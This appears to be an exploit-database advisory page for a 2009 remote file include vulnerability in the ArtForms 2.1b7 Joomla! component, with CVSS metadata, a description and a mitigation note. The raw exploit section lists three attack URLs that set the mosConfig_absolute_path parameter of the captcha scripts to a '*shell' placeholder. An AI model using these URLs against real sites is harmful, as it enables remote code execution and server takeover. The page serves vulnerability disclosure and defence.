ArtForms 2.1b7 remote file includes

vendor:

ArtForms

by:

iskorpitx

7,5

CVSS

HIGH

Remote File Include (RFI)

CWE

Product Name: ArtForms

Affected Version From: 2.1b7

Affected Version To: 2.1b7

Patch Exists: Yes

Related CWE: N/A

CPE: a:artforms:artforms:2.1b7

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Joomla!

2009

ArtForms 2.1b7 remote file includes

The ArtForms 2.1b7 component for Joomla! contains a vulnerability that allows remote attackers to include arbitrary files from local resources via a URL in the mosConfig_absolute_path parameter to the imgcaptcha.php, mp3captcha.php, and swfmovie.php scripts in the components/com_artforms/assets/captcha/includes/captchaform/ and components/com_artforms/assets/captcha/includes/captchatalk/ directories, respectively.

Mitigation:

Upgrade to the latest version of ArtForms 2.1b7 or later.

Source

Exploit-DB raw data:

ArtForms 2.1b7 remote file includes
 
From Turkey
iskorpitx (O bir dÃ¼nya markasÄ± Asla Taklit Edilemez)
 
// swfmovie.php - swf output and config
 
/* output captcha image */
 
/* output captcha mp3 */
 
----------------------------------------------------------------------------------
 
[path]/components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=*shell

[path]/components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=*shell

[path]/components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=*shell
-----------------------------------------------------------------------------------
by iskorpitx
admin@mavi1.org

# milw0rm.com [2009-05-15]